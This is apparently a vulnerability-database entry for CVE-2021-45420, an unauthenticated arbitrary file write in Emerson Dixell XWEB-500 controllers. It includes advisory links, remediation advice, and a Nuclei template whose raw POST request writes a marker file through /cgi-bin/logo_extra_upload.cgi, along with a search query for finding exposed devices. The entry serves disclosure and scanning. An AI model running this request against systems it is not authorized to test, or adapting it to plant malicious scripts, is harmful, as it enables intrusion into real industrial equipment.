Lucene search
K

Emerson Dixell XWEB-500 - Arbitrary File Write

šŸ—“ļøĀ 07 Jul 2026Ā 16:50:48Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 13Ā Views

Emerson Dixell XWEB-500 allows unauthenticated arbitrary file write via three CGI endpoints.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-45420
14 Feb 202214:15
–attackerkb
BDU FSTEC
The vulnerability of the server for computer control and monitoring of Emerson Dixell XWEB-500 allows a intruder to execute arbitrary code.
31 Jan 202400:00
–bdu_fstec
Circl
CVE-2021-45420
14 Feb 202216:33
–circl
CNNVD
Emerson Xweb-500 ęŽˆęƒé—®é¢˜ę¼ę“ž
14 Feb 202200:00
–cnnvd
Check Point Advisories
Emerson Dixell Arbitrary File Write (CVE-2021-45420)
13 Jun 202200:00
–checkpoint_advisories
CVE
CVE-2021-45420
14 Feb 202213:08
–cve
Cvelist
CVE-2021-45420
14 Feb 202213:08
–cvelist
NVD
CVE-2021-45420
14 Feb 202214:15
–nvd
Prion
Design/Logic Flaw
14 Feb 202214:15
–prion
Positive Technologies
PT-2021-7988 Ā· Emerson Ā· Emerson Dixell Xweb-500
20 Dec 202100:00
–ptsecurity
Rows per page
id: CVE-2021-45420

info:
  name: Emerson Dixell XWEB-500 - Arbitrary File Write
  author: hackerarpan
  severity: critical
  description: |
    Emerson Dixell XWEB-500 contains an arbitrary file write caused by unauthenticated access to /cgi-bin/logo_extra_upload.cgi, /cgi-bin/cal_save.cgi, and /cgi-bin/lo_utils.cgi, letting attackers write any file on the system, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can write arbitrary files to any location on the Dixell XWEB-500 server, potentially uploading malicious CGI scripts or modifying system files.
  remediation: |
    Apply firmware updates provided by Emerson Dixell or restrict network access to the device.
  reference:
    - https://www.exploit-db.com/exploits/50639
    - https://www.swascan.com/emerson
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45420
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45420
    cwe-id: CWE-200
    epss-score: 0.22138
    epss-percentile: 0.97379
    cpe: cpe:2.3:h:emerson:dixell_xweb-500:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: emerson
    product: dixell_xweb-500
    google-query: inurl:"xweb500.cgi"
  tags: cve,cve2021,lfw,iot,dixell,xweb500,edb,fileupload,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{randstr}}.txt
        dixell-xweb500-filewrite
      - |
        GET /logo/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "dixell-xweb500-filewrite")'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b7e71fbacd945a681e08ffc827e9b734ad6a600b5fe590b744c29957f91de9cd022100de87a72515ded58b69772572566395d52f32648850c39138d60cdb445e36b756:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
CVSS 210
EPSS0.22138
13